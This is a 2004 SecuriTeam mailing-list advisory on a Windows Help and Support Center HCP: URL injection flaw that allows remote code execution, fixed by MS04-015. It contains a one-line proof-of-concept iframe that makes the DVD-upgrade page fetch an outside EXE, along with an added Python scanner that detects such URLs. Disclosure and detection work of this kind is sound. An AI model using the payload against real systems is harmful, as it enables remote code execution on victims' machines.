[NT] Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)
From: SecuriTeam (support_at_securiteam.com)
Date: 05/12/04
To: list@securiteam.com Date: 12 May 2004 19:02:26 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Windows Help Center Command Execution (Technical Details, HSC, Dvdupgrade)
------------------------------------------------------------------------
SUMMARY
"Help and Support Center (HSC) is a feature in Windows that provides help
on a variety of topics" It can also be accessed via HCP: URLs. HSC is
installed by default on Windows XP and Windows Server 2003 systems.
An input validation vulnerability in HSC exposes users to remote code
execution. An attacker could use this vulnerability to run arbitrary code
whenever the victim opens a specially formatted HCP: URL. The user may be
automatically directed to such a URL when visiting a particular web page.
The issue can also be exploited via e-mail.
DETAILS
Vulnerable Systems:
* Microsoft Windows XP and Microsoft Windows XP Service Pack 1
* Microsoft Windows XP 64-Bit Edition Service Pack 1
* Microsoft Windows XP 64-Bit Edition Version 2003
* Microsoft Windows Server 2003
* Microsoft Windows Server 2003 64-Bit Edition
The HSC installation contains various HTML and JavaScript files which are
intended for HSC's internal use. The HTML files belong to the My Computer
zone because they require, for example, the ability to launch external
helper programs with JavaScript.
By using a specially crafted URL, an attacker can cause the user's local
machine to start helpctr.exe, which renders in the local context and
receives the injected URL as its argument. The user is then presented with
the Help and Support DVD Upgrade dialog in Help and Support Center.
On the Dvdupgrade page the injected URL is linked to the "Upgrade Now"
button. When the user presses it, an (Open) / (Save) dialog box is shown
for the offending (attacker's) file.
This allows an attacker to initiate the Dvdupgrade action in HSC and inject
JavaScript code which will run in the context of these HTML files,
specifically "HCP://system/DVDUpgrd/dvdupgrd.htm". In this way the
attacker can run scripts in the My Computer zone, which can, for example,
download and start an attacker-supplied EXE program.
As an aside, no URL activity is displayed, and Help and Support has no
address or status bar.
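The mechanism above gives defenders a concrete thing to look for: any hcp: URL embedded in web or e-mail content that carries injected input, in particular the DVD-upgrade page with a "website" parameter. The following scanner is an added example written for this bulletin, not code from the advisory or from exploitlabs; the sample HTML and its example.invalid host are constructed.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed sample: a hidden frame pointing at the HSC DVD-upgrade page with an
# attacker-controlled "website" parameter, next to a harmless hcp: help link.
SAMPLE_HTML = """
<html><body>
<p>Benign link: <a href="hcp://system/home">Help and Support</a></p>
<iframe src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=example.invalid/poc/file.exe"
        width="1" height="1"></iframe>
<img src="http://example.invalid/logo.png">
</body></html>
"""

URL_ATTRS = {"src", "href", "data", "action"}  # attributes that can launch a protocol handler


class HcpLinkCollector(HTMLParser):
    """Collects every hcp: URL referenced from a URL-bearing attribute."""

    def __init__(self):
        super().__init__()
        self.hcp_urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value and value.lower().startswith("hcp:"):
                self.hcp_urls.append((tag, value))


def classify_hcp_url(url):
    """Return a finding string for an hcp: URL that carries injected input, else None."""
    parts = urlsplit(url)                 # scheme hcp, netloc "system", path, query
    path = parts.path.lower()
    params = parse_qs(parts.query)
    if "dvdupgrd.htm" in path and "website" in params:
        return f"dvdupgrd website injection -> {params['website'][0]}"
    if parts.query:
        # Internal help pages are not expected to be driven by external query strings.
        return f"hcp URL with query string -> {parts.query}"
    return None


def scan_html(html):
    """Return a list of (tag, url, finding) for suspicious hcp: references in html."""
    collector = HcpLinkCollector()
    collector.feed(html)
    findings = []
    for tag, url in collector.hcp_urls:
        finding = classify_hcp_url(url)
        if finding:
            findings.append((tag, url, finding))
    return findings
```

Running scan_html over proxy-captured pages or rendered mail bodies flags the hidden iframe while leaving the plain hcp://system/home link alone.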
Solution:
Microsoft was contacted on March 18th, 2004. A patch has been produced to
correct the vulnerability. They have issued the following advisory:
http://www.microsoft.com/technet/security/bulletin/ms04-015.mspx
Proof of Concept:
<iframe
src="HCP://system/DVDUpgrd/dvdupgrd.htm?website=exploitlabs.com/msnspoof/poc/dvdupgd/dvdupgd.exe" width="1" height="1">
</iframe>
http://exploitlabs.com/msnspoof/poc/
http://exploitlabs.com/msnspoof/poc/index2.html
http://exploitlabs.com/msnspoof/poc/index3.jpg
ADDITIONAL INFORMATION
The information has been provided by Donnie Werner of exploitlabs
<mailto:security@exploitlabs.com>.
The original article can be found at:
http://exploitlabs.com/files/advisories/EXPL-A-2003-027-helpctr.txt
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.